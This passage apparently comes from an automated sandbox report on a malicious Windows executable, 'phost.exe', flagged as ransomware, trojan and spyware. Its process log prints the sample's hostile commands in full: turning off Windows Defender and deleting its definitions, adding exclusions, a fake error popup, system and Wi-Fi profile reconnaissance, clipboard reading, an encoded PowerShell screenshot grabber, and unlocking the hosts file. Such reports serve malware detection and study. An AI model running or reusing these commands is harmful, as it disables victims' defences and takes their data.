              Source: phost.exe, 00000001.00000002.2186390220.00007FFE1330C000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2184635947.00007FFDFB8A2000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs phost.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\phost.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\phost.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
              Source: python312.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994210643762751
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9971739243943192
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942978533094812
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/60@4/3
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCCCAFC GetLastError,FormatMessageW,105_2_00007FF6BBCCCAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCCEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,105_2_00007FF6BBCCEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCFB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,105_2_00007FF6BBCFB57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD3144 GetDiskFreeSpaceExW,105_2_00007FF6BBCD3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:404:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7600:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
              Source: C:\Users\user\Desktop\phost.exeMutant created: \Sessions\1\BaseNamedObjects\z
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202Jump to behavior
              Source: phost.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\phost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: phost.exeReversingLabs: Detection: 34%
              Source: phost.exeString found in binary or memory: set-addPolicy
              Source: phost.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\phost.exeFile read: C:\Users\user\Desktop\phost.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\phost.exe "C:\Users\user\Desktop\phost.exe"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Users\user\Desktop\phost.exe "C:\Users\user\Desktop\phost.exe"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
